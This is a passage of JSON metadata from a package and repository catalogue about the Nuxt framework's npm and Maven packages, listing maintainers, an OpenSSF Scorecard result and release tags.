sheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fgenerator-edge/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-12T21:18:44.161Z","updated_at":"2023-12-12T21:18:44.161Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5990216,"name":"org.webjars.npm:nuxt__vite-builder","ecosystem":"maven","description":"WebJar for @nuxt/vite-builder","homepage":"https://www.webjars.org","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"org.webjars.npm","versions_count":8,"first_release_published_at":"2022-12-27T02:23:34.000Z","latest_release_published_at":"2023-06-15T14:22:18.000Z","latest_release_number":"3.5.3","last_synced_at":"2026-05-11T01:23:07.107Z","created_at":"2023-01-26T17:24:20.939Z","updated_at":"2026-05-11T01:23:07.107Z","registry_url":"https://central.sonatype.com/artifact/org.webjars.npm/nuxt__vite-builder/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.webjars.npm/nuxt__vite-builder/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/r